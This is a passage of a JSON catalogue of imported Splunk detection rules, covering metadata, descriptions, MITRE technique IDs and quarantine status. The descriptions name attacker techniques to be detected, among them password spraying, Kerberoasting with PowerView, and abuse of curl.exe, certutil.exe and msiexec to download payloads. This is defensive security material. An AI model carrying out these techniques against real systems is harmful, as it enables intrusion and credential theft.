Multiple Users Failing To Authenticate From Ip", "description": "The following analytic detects a single source IP failing to authenticate with 30 unique valid users within 5 minutes in Azure Active Directory. It leverages Azure AD SignInLogs with error code 50126, indicating invalid passwords. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges by trying common passwords across many accounts. If confirmed malicious, this activity could lead to unauthorized access, data breaches, or privilege escalation within the Azure AD environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multiple-users-failing-to-authenticate-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94481a6a-8f59-4c86-957f-55a71e3612a6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multiple_users_failing_to_authenticate_from_ip.yml" } }, { "id": "splunk-security-content-94531a31-a041-4777-909f-cd92ed3b71ad", "type": "detection", "name": "Cisco Isovalent - Cron Job Creation", "description": "The following analytic detects the creation of a cron job within the Cisco Isovalent environment. It identifies this activity by monitoring process execution logs for cron job creation events. This behavior is significant for a SOC as it could allow an attacker to execute malicious tasks repeatedly and automatically, posing a threat to the Kubernetes infrastructure. If confirmed malicious, this activity could lead to persistent attacks, service disruptions, or unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003", "T1053.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-cron-job-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94531a31-a041-4777-909f-cd92ed3b71ad", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___cron_job_creation.yml" } }, { "id": "splunk-security-content-94665d8c-b841-4ff4-acb4-34d613e2cbfe", "type": "detection", "name": "Zscaler Exploit Threat Blocked", "description": "The following analytic identifies potential exploit attempts involving command and script interpreters blocked by Zscaler. It leverages web proxy logs to detect incidents where actions are blocked due to exploit references. The detection compiles statistics by user, threat name, URL, hostname, file class, and filename. This activity is significant as it helps identify and mitigate exploit attempts, which are critical for maintaining security. If confirmed malicious, such activity could lead to unauthorized code execution, privilege escalation, or persistent access within the environment, posing a severe threat to organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-exploit-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94665d8c-b841-4ff4-acb4-34d613e2cbfe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_exploit_threat_blocked.yml" } }, { "id": "splunk-security-content-94859172-a521-474f-97ac-4cf4b09634a3", "type": "detection", "name": "Windows System Remote Discovery With Query", "description": "The following analytic detects the execution of `query.exe` with command-line arguments aimed at discovering data on remote devices. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as adversaries may use `query.exe` to gain situational awareness and perform Active Directory discovery on compromised endpoints. If confirmed malicious, this behavior could allow attackers to identify various details about a system, aiding in further lateral movement and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-remote-discovery-with-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94859172-a521-474f-97ac-4cf4b09634a3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_remote_discovery_with_query.yml" } }, { "id": "splunk-security-content-94994255-3acf-4213-9b3f-0494df03bb31", "type": "detection", "name": "Cloud Provisioning Activity From Previously Unseen Country", "description": "The following analytic detects cloud provisioning activities originating from previously unseen countries. It leverages cloud infrastructure logs and compares the geographic location of the source IP address against a baseline of known locations. This activity is significant as it may indicate unauthorized access or potential compromise of cloud resources. If confirmed malicious, an attacker could gain control over cloud assets, leading to data breaches, service disruptions, or further infiltration into the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-provisioning-activity-from-previously-unseen-country.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94994255-3acf-4213-9b3f-0494df03bb31", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_provisioning_activity_from_previously_unseen_country.yml" } }, { "id": "splunk-security-content-94cb89aa-aec1-4585-91b1-affcdacf357e", "type": "detection", "name": "GitHub Enterprise Remove Organization", "description": "The following analytic detects when a user removes an organization from GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for organization deletion events, which could indicate unauthorized removal of critical business resources. For a SOC, identifying organization removals is crucial as it may signal account compromise, insider threats, or malicious attempts to disrupt business operations by deleting entire organizational structures. The impact could be severe, potentially resulting in loss of source code, repositories, team structures, access controls, and other critical organizational assets. This disruption could halt development workflows, cause data loss, and require significant effort to restore from backups if available. Additionally, unauthorized organization removal could be part of a larger attack campaign aimed at destroying or compromising enterprise assets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-remove-organization.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94cb89aa-aec1-4585-91b1-affcdacf357e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_remove_organization.yml" } }, { "id": "splunk-security-content-94e3ba29-6245-4f25-8d47-d5b6b34c40ac", "type": "detection", "name": "Windows Outlook Dialogs Disabled from Unusual Process", "description": "The following analytic detects the modification of the Windows Registry key \"PONT_STRING\" under Outlook Options. This disables certain dialog popups, which could allow malicious scripts to run without notice. This detection leverages data from the Endpoint.Registry datamodel to search for this key changing from an unusual process. This activity is significant as it is commonly associated with some malware infections, indicating potential malicious intent to harvest email information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-outlook-dialogs-disabled-from-unusual-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94e3ba29-6245-4f25-8d47-d5b6b34c40ac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_outlook_dialogs_disabled_from_unusual_process.yml" } }, { "id": "splunk-security-content-94ebc001-35e7-4ae8-9b0e-52766b2f99c7", "type": "detection", "name": "Cisco NVM - Suspicious Download From File Sharing Website", "description": "This analytic detects suspicious downloads from common file sharing and content delivery platforms using known living-off-the-land binaries (LOLBins)\nsuch as 'curl.exe', 'certutil.exe', 'msiexec.exe', 'powershell.exe', 'wmic.exe', and others.\nIt leverages Cisco Network Visibility Module logs to correlate network flow activity with process context, including command-line arguments, process path,\nand parent process information. These tools are often abused by adversaries and malware to retrieve payloads from public hosting platforms\nsuch as GitHub, Discord CDN, Transfer.sh, or Pastebin.\nThis detection helps identify potential initial access, payload staging, or command and control activity using legitimate services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-suspicious-download-from-file-sharing-website.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94ebc001-35e7-4ae8-9b0e-52766b2f99c7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___suspicious_download_from_file_sharing_website.yml" } }, { "id": "splunk-security-content-94fc85a1-e55b-4265-95e1-4b66730e05c0", "type": "detection", "name": "Headless Browser Mockbin or Mocky Request", "description": "The following analytic detects headless browser activity accessing mockbin.org or mocky.io. It identifies processes with the \"--headless\" and \"--disable-gpu\" command line arguments, along with references to mockbin.org or mocky.io. This behavior is significant as headless browsers are often used for automated tasks, including malicious activities like web scraping or automated attacks. If confirmed malicious, this activity could indicate an attempt to bypass traditional browser security measures, potentially leading to data exfiltration or further exploitation of web applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/headless-browser-mockbin-or-mocky-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94fc85a1-e55b-4265-95e1-4b66730e05c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/headless_browser_mockbin_or_mocky_request.yml" } }, { "id": "splunk-security-content-95165985-ace5-4d42-9c42-93a89a5af901", "type": "detection", "name": "Linux Auditd Install Kernel Module Using Modprobe Utility", "description": "The following analytic detects the installation of a Linux kernel module using the modprobe utility. It leverages data from Linux Auditd, focusing on process names and command-line executions. This activity is significant because installing a kernel module can indicate an attempt to deploy a rootkit or other malicious kernel-level code, potentially leading to elevated privileges and bypassing security detections. If confirmed malicious, this could allow an attacker to gain persistent, high-level access to the system, compromising its integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-install-kernel-module-using-modprobe-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "95165985-ace5-4d42-9c42-93a89a5af901", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_install_kernel_module_using_modprobe_utility.yml" } }, { "id": "splunk-security-content-952e80d0-e343-439b-83f4-808c3e6fbf2e", "type": "detection", "name": "Azure AD PIM Role Assignment Activated", "description": "The following analytic detects the activation of an Azure AD Privileged Identity Management (PIM) role. It leverages Azure Active Directory events to identify when a user activates a PIM role assignment, indicated by the \"Add member to role completed (PIM activation)\" operation. Monitoring this activity is crucial as PIM roles grant elevated privileges, and unauthorized activation could indicate an adversary attempting to gain privileged access. If confirmed malicious, this could lead to unauthorized administrative actions, data breaches, or further compromise of the Azure environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-pim-role-assignment-activated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "952e80d0-e343-439b-83f4-808c3e6fbf2e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_pim_role_assignment_activated.yml" } }, { "id": "splunk-security-content-953322db-128a-4ce9-8e89-56e039e33d98", "type": "detection", "name": "Windows Suspect Process With Authentication Traffic", "description": "The following analytic detects executables running from public or temporary locations that are communicating over Windows domain authentication ports/protocols such as LDAP (389), LDAPS (636), and Kerberos (88). It leverages network traffic data to identify processes originating from user-controlled directories. This activity is significant because legitimate applications rarely run from these locations and attempt domain authentication, making it a potential indicator of compromise. If confirmed malicious, attackers could leverage this to access domain resources, potentially leading to further exploitation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspect-process-with-authentication-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "953322db-128a-4ce9-8e89-56e039e33d98", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspect_process_with_authentication_traffic.yml" } }, { "id": "splunk-security-content-9556f7b7-285f-4f18-8eeb-963d989f9d27", "type": "detection", "name": "Windows AppLocker Rare Application Launch Detection", "description": "The following analytic detects the launch of rarely used applications within the environment, which may indicate the use of potentially malicious software or tools by attackers. It leverages Windows AppLocker event logs, aggregating application launch counts over time and flagging those that significantly deviate from the norm. This behavior is significant as it helps identify unusual application activity that could signal a security threat. If confirmed malicious, this activity could allow attackers to execute unauthorized code, potentially leading to further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-applocker-rare-application-launch-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9556f7b7-285f-4f18-8eeb-963d989f9d27", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_applocker_rare_application_launch_detection.yml" } }, { "id": "splunk-security-content-95a7f9a5-6096-437e-a19e-86f42ac609bd", "type": "detection", "name": "Detect Excessive User Account Lockouts", "description": "The following analytic identifies user accounts experiencing an excessive number of lockouts within a short timeframe. It leverages the 'Change' data model, specifically focusing on events where the result indicates a lockout. This activity is significant as it may indicate a brute-force attack or misconfiguration, both of which require immediate attention. If confirmed malicious, this behavior could lead to account compromise, unauthorized access, and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-excessive-user-account-lockouts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "95a7f9a5-6096-437e-a19e-86f42ac609bd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_excessive_user_account_lockouts.yml" } }, { "id": "splunk-security-content-95b11d20-e2c6-46a5-b526-8629f5f0860a", "type": "detection", "name": "Windows PUA Named Pipe", "description": "The following analytic detects the creation or connection to named pipes used by potentially unwanted applications (PUAs) like VPNs or utilities like PsExec.\nIt leverages Sysmon EventCodes 17 and 18.\nIf confirmed malicious, this could allow an attacker to abuse these to potentially gain persistence, command and control, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559", "T1021.002", "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-pua-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "95b11d20-e2c6-46a5-b526-8629f5f0860a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_pua_named_pipe.yml" } }, { "id": "splunk-security-content-95b8061a-0a67-11ec-85ec-acde48001122", "type": "detection", "name": "PetitPotam Network Share Access Request", "description": "The following analytic detects network share access requests indicative of the PetitPotam attack (CVE-2021-36942). It leverages Windows Event Code 5145, which logs attempts to access network share objects. This detection is significant as PetitPotam can coerce authentication from domain controllers, potentially leading to unauthorized access. If confirmed malicious, this activity could allow attackers to escalate privileges or move laterally within the network, posing a severe security risk. Ensure Event Code 5145 is enabled via Group Policy to utilize this analytic effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/petitpotam-network-share-access-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "95b8061a-0a67-11ec-85ec-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/petitpotam_network_share_access_request.yml" } }, { "id": "splunk-security-content-95cf4608-4302-11ec-8194-3e22fbd008af", "type": "detection", "name": "Scheduled Task Initiation on Remote Endpoint", "description": "The following analytic detects the use of 'schtasks.exe' to start a Scheduled Task on a remote endpoint. This detection leverages Endpoint Detection and Response (EDR) data, focusing on process details such as process name, parent process, and command-line executions. This activity is significant as adversaries often abuse Task Scheduler for lateral movement and remote code execution. If confirmed malicious, this behavior could allow attackers to execute arbitrary code remotely, potentially leading to further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/scheduled-task-initiation-on-remote-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "95cf4608-4302-11ec-8194-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/scheduled_task_initiation_on_remote_endpoint.yml" } }, { "id": "splunk-security-content-95f8acd6-978e-42d6-99c1-85baacdd2b46", "type": "detection", "name": "Windows Chromium process Launched with Disable Popup Blocking", "description": "The following analytic detects instances where a Windows Chromium-based browser process is launched with the `--disable-popup-blocking` flag. This flag is typically used to bypass the browser\u2019s built-in pop-up protections, allowing automatic execution of pop-ups or redirects without user interaction. While legitimate in some testing or automation scenarios, its presence on endpoints, particularly when combined with other automation or concealment flags, may indicate attempts by malicious actors to execute web-based content stealthily or evade user interaction controls, representing a potential security risk that warrants investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-process-launched-with-disable-popup-blocking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "95f8acd6-978e-42d6-99c1-85baacdd2b46", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_process_launched_with_disable_popup_blocking.yml" } }, { "id": "splunk-security-content-9683271d-92e4-43b5-a907-1983bfb9f7fd", "type": "detection", "name": "Windows MsiExec HideWindow Rundll32 Execution", "description": "The following analytic detects the execution of the msiexec.exe process with the /HideWindow and rundll32 command-line parameters. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line arguments. This activity is significant because it is a known tactic used by malware like QakBot to mask malicious operations under legitimate system processes. If confirmed malicious, this behavior could allow an attacker to download additional payloads, execute malicious code, or establish communication with remote servers, thereby evading detection and maintaining persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msiexec-hidewindow-rundll32-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9683271d-92e4-43b5-a907-1983bfb9f7fd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msiexec_hidewindow_rundll32_execution.yml" } }, { "id": "splunk-security-content-96bce783-c22e-4e48-8cf1-3eb2794c5083", "type": "detection", "name": "Cisco Secure Firewall - Lumma Stealer Activity", "description": "This analytic detects Lumma Stealer activity using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where four of the following Snort signature IDs 64793, 64794, 64797, 64798, 64799, 64800, 64801, 62709, 64167, 64168, 64169, 64796, 62710, 62711, 62712, 62713, 62714, 62715, 62716, 62717, 64812, 64810, 64811 occurs in the span of 15 minutes from the same host.\nIf confirmed malicious, this behavior is highly indicative of a successful infection of Lumma Stealer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1210", "T1027", "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-lumma-stealer-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "96bce783-c22e-4e48-8cf1-3eb2794c5083", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___lumma_stealer_activity.yml" } }, { "id": "splunk-security-content-970455a1-4ac2-47e1-a9a5-9e75443ddcb9", "type": "detection", "name": "Windows PowerView Kerberos Service Ticket Request", "description": "The following analytic detects the execution of the `Get-DomainSPNTicket` commandlet, part of the PowerView tool, by leveraging PowerShell Script Block Logging (EventCode=4104). This commandlet requests Kerberos service tickets for specified service principal names (SPNs). Monitoring this activity is crucial as it can indicate attempts to perform Kerberoasting, a technique used to extract SPN account passwords via cracking tools like hashcat. If confirmed malicious, this activity could allow attackers to gain unauthorized access to sensitive accounts, potentially leading to privilege escalation and further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powerview-kerberos-service-ticket-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "970455a1-4ac2-47e1-a9a5-9e75443ddcb9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powerview_kerberos_service_ticket_request.yml" } }, { "id": "splunk-security-content-9777e7e3-2499-4a16-a519-ebe33630c1e8", "type": "detection", "name": "Windows Symlink Evaluation Change via Fsutil", "description": "This analytic detects the execution of the Windows built-in tool Fsutil.exe with\nthe \"behavior\", \"set\" and \"SymlinkEvaluation\" parameters.\nAttackers can abuse this to alter symlink evaluation behavior on Windows, potentially enabling remote traversal over SMB shares or evading defenses.\nSuch changes should be uncommon or even rare in enterprise environments and should be investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-symlink-evaluation-change-via-fsutil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9777e7e3-2499-4a16-a519-ebe33630c1e8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_symlink_evaluation_change_via_fsutil.yml" } }, { "id": "splunk-security-content-977b3082-5f3d-11ec-b954-acde48001122", "type": "detection", "name": "Linux At Allow Config File Creation", "description": "The following analytic detects the creation of the /etc/at.allow or /etc/at.deny configuration files in Linux. It leverages file creation events from the Endpoint datamodel to identify when these files are created. This activity is significant as these files control user permissions for the \"at\" scheduling application and can be abused by attackers to establish persistence. If confirmed malicious, this could allow unauthorized execution of malicious code, leading to potential data theft or further system compromise. Analysts should review the file path, creation time, and associated processes to assess the threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-at-allow-config-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "977b3082-5f3d-11ec-b954-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_at_allow_config_file_creation.yml" } }, { "id": "splunk-security-content-977da0c0-c7d5-45de-8b7e-f79e959ca13d", "type": "detection", "name": "Windows Product Key Registry Query", "description": "This Analytic detects the execution of a process attempting to access the registry for product key recovery purposes.\nThis behavior could be significant as it might indicate potential malware activity or attempts to bypass security measures or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-product-key-registry-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "977da0c0-c7d5-45de-8b7e-f79e959ca13d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_product_key_registry_query.yml" } }, { "id": "splunk-security-content-97937ece-cb13-4dbc-9684-c0dc3afd400a", "type": "detection", "name": "Windows Wmic Systeminfo Discovery", "description": "The following analytic detects the execution of Windows Management Instrumentation Command-line (WMIC) commands used for computer system discovery on a Windows system. Specifically, it monitors for commands such as \u201cwmic computersystem\u201d that retrieve detailed information about the computer\u2019s model, manufacturer, name, domain, and other system attributes. While these commands are commonly used by administrators for inventory and troubleshooting, they may also be exploited by adversaries to gain insight into the target environment during the reconnaissance phase of an attack. Identifying and alerting on WMIC computer system queries helps security teams recognize 